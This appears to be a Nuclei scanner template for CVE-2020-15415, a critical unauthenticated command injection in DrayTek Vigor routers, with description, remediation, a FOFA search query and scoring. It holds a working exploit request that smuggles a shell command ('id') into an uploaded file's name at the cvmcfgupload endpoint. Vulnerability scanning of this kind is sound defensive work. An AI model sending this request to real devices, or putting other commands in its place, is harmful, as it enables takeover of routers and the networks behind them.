id: CVE-2020-15415

info:
  name: DrayTek Vigor - Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    DrayTek Vigor devices contain a command injection vulnerability in the cvmcfgupload functionality. The vulnerability allows remote attackers to execute arbitrary commands through specially crafted requests to the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands on DrayTek Vigor devices via the cvmcfgupload endpoint, leading to complete device compromise and potential network infiltration.
  remediation: |
    Update the firmware to the latest version provided by DrayTek. If no update is available, consider implementing network segmentation to restrict access to the device's management interface.
  reference:
    - https://github.com/CLP-team/Vigor-Commond-Injection
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15415
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15415
    cwe-id: CWE-78
    epss-score: 0.93003
    epss-percentile: 0.99789
    cpe: cpe:2.3:h:draytek:vigor:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: draytek
    product: vigor
    fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"'
  tags: cve,cve2020,draytek,rce,router,kev,vkev,vuln

http:
  - raw:
      - |
        POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

        ------WebKitFormBoundary
        Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"
        Content-Type: text/x-python-script

        ------WebKitFormBoundary--

    matchers:
      - type: dsl
        dsl:
          - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)
          - contains(header, 'DWS')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022034b268599847cf7e819172d6300268075154b88736f8b1f640f802472f68005d022100e4300251b1c853a3e11bb0e40b9afd314538565d38f4934b03a1338613c0d258:922c64590222798bb761d5b6d8e72950